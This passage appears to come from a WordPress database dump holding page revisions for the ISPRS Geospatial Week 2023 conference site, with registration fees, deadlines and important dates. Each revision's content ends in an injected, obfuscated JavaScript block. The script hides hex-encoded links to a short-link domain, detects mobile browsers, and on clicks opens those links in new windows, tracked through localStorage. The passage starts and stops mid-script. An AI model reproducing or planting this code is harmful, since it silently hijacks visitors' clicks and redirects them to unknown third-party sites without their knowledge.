Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-04-02 01:03:00','2023-04-02 01:03:00','',2638,'https://gsw2023.com/?p=3981',0,'revision','',0),
(3982,1,'2023-04-02 01:06:31','2023-04-02 01:06:31','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">REGISTER NOW</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span>[/bsf-info-box][vc_separator style=\"shadow\" border_width=\"8\"][vc_column_text]<strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>\n<p style=\"font-weight: 400;\">Early bird registration deadline: June 1, 2023</p>\n</li>\n<li>\n<p style=\"font-weight: 400;\">Late registration deadline: July 15, 2023</p>\n</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than July 1, 2023. No refunds after this date, but replacement is allowed.</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Two social dinners will be organized on Sep. 3<sup>rd</sup> and Sep. 5<sup>th</sup></strong></span></p>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-04-02 01:06:31','2023-04-02 01:06:31','',2638,'https://gsw2023.com/?p=3982',0,'revision','',0),
(3983,1,'2023-04-02 01:07:48','2023-04-02 01:07:48','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><strong>Priority well be given to early Submissions</strong></li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n</div>\n<p><strong style=\"font-size: 14pt;\">Registration deadlines</strong></p>\n<div class=\"three_quarter first\">\n<ul>\n<li>Early bird registration deadline: June 1, 2023</li>\n<li>Late registration deadline: July 15, 2023</li>\n</ul>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 